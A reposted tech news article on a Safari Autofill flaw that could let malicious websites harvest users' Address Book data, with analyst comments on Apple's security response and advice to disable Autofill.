Sabkush Headlines: Safari Autofill Full of Fail

Sabkush Headlines: Safari Autofill Full of FailSafari Autofill Full of Fail





Safaris Autofill feature, which can be set to automatically insert a users data such as name and address into Web forms, could expose users to theft of their personal information, according to security Planning for the next peak season? Ensure your website is fast, secure and available 24/7. Click here to learn how. expert Jeremiah Grossman. Grossman, the founder and CTO of security firm WhiteHat, wrote in his blog that the feature autofills HTML form text fields with specific attribute names such as "name," "company," "city," and "state." It works even though the victim has not entered this data on any website. Its been known since 2006 that the Autofill feature on a browser could be a security risk. Stealing Data With Safari Autofill Safari browser users can have their data stolen the moment they visit malicious websites, even if theyve not visited those sites before or entered any personal information, Grossman wrote. "All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text field with the aforementioned names, probably invisibly, and then simulate A-A keystroke events using JavaScript," Grossman wrote. Once the webform has been autofilled, the data can be sent to the attacker, Grossman wrote. "The entire process takes mere seconds and represents a major breach in online privacy," Grossman wrote. Multi-stage attacks, including email spam, spearphishing, stalking and blackmail, could be launched using this technique, Grossman wrote. Such attacks could be easily and cheaply distributed on a large scale using an advertising network "where likely no one would ever notice because its not exploit code designed to deliver rootkit payload," Grossman wrote. There is no guarantee this type of attack hasnt already taken place, he said. "This feature just makes it easier for criminals to do mass collections of information that they can later sell, and compromise your identity," said Rob Enderle, principal analyst at the Enderle Group. However, the Autofill attack cant obtain data beginning with a number, such as phone numbers or street addresses because "for some reason the data would not populate in the text field," Grossman wrote. Any Apple Polishing Yet? Grossman notified Apple (Nasdaq: AAPL) on June 17 and received an autoresponse but hasnt heard from Apple since, he wrote. "Apple has been substantially less aggressive publicly with security issues than either Mozilla or Microsoft (Nasdaq: MSFT) for over a decade," Enderle pointed out. "It seems to practice the dont ask, dont tell process of threat mitigation in general, which means we are never sure what they actually know with regard to problems," Enderle told MacNewsWorld. Perhaps Apple has good reason to downplay security threats. "The Mac market share has been small enough that it would take a large percentage of Mac users complaining for a problem to be seen as needing to be addressed," Randy Abrams, director, technical education at ESET, told MacNewsWorld. "I suspect that more than 90 percent of Mac users are completely unaware of the issue so, even if they did care, they dont know to care," Abrams added. Autofill Attack Targets Apparently, the attack doesnt work on the browser used in iOS, the operating system Apple uses for the iPhone, iPad and iPod touch, according to one readers comment on Grossmans blog. Further, some readers werent able to duplicate the attack on Safari 5, although others were. Other browsers may not be threatened by the Autofill attack. "I am not aware of the problem affecting other browsers," ESETs Abrams said. "I believe that Safari is unique in linking to the address book by default." Practicing Safe Mac Use The solution to this problem seems to be easy enough: Mac users just have to turn off the Autofill feature in their Safari browsers. "Thats true, but who wants to turn off Autofill?" Enderle asked. "That is one handy feature." However, turning off the Autofill feature isnt enough. "In theory, thats the solution, but users should delete the contents of their address book in the Mac OS and use a third-party address book thats not linked to a browser," ESETs Abrams said. Users should review the settings of their Web browsers and other applications, Abrams recommended. "Theres no guarantee that when the next version of Safari comes out, it wont revert to default settings," he pointed out. Even if users select another browser, such as Firefox, they need to check the default settings, Abrams warned. "Users will never be sure of remaining safe or maintaining their privacy if they do not review their browser settings and change them to enhance security and privacy from the lax default settings the browsers ship with," Abrams remarked. "Dont use autofill for information such as passwords, birth dates, Social Security numbers, credit card validation numbers and credit card expiration dates," Enderle said. "If you wouldnt put it on Facebook, it shouldnt be in Autofill." Nothing New Under the Sun? The danger of the Safari Autofill feature was disclosed as early as April 2009 by Swiss software developer and entrepreneur Patrice Neff. He wrote some HTML code to conduct an autofill attack that would steal a users birthdate and posted it on his blog. Indeed, the Autofill features dangers were being discussed on the Internet as far back as 2006. Why has nobody done anything about this? "The Autofill feature is really handy and people will often take a very real benefit when its offset only by a very murky risk," Enderle said.